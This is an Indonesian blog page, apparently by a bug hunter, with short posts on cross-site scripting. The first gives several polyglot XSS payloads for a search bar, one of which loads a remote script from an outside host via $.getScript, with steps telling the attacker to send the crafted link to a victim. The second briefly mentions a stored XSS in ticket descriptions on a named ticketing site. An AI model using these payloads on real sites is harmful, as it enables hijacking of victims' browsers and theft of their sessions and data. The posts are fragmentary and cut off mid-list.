Postingan

XSS INFECTED Search Bar

Gambar
XSS INFECTED xss yang satu ini lumayan berbahaya karena bekerja pada halaman search Step : 1.attacker input this script on search bar javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+$.getScript("//nandoxp1.xss.ht")//'> or javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+window.location.replace("http://www.w3schools.com")//'> or javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(“xss”)//'> javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+window.location.replace("http://www.w3schools.com")//'> 2. attacker give to victim 3.

XSS INJECTION ON LOKET.COM

Gambar
STORED XSS ON TIKET STORED Caranya hanya membuat halaman tiket dan cantumkan deskripsi Reward: